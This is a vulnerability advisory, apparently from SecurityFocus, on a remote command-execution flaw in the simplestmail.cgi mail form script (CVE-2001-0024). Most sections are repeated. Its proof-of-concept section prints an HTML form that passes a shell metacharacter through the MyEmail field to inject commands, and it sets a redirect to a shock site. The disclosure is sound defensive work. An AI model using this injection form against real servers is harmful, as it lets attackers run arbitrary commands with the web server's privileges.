Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability
BID:2102
Info
Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability
| Bugtraq ID: | 2102 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-0024 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Dec 11 2000 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | reported to bugtraq by rpc rpc <[email protected]> on Dec 11 2000 |
| Vulnerable: |
Leif M. Wright simplestmail.cgi 1.0 |
| Not Vulnerable: | |
Discussion
Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability
A vulnerabiliy exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms.
An insecurely-structured call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privilege of the webserver.
A vulnerabiliy exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms.
An insecurely-structured call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privilege of the webserver.
Exploit / POC
Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability
Excerpted from the original bugtraq post by rpc:
<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>
Excerpted from the original bugtraq post by rpc:
<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>
Solution / Fix
Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability
References:
References: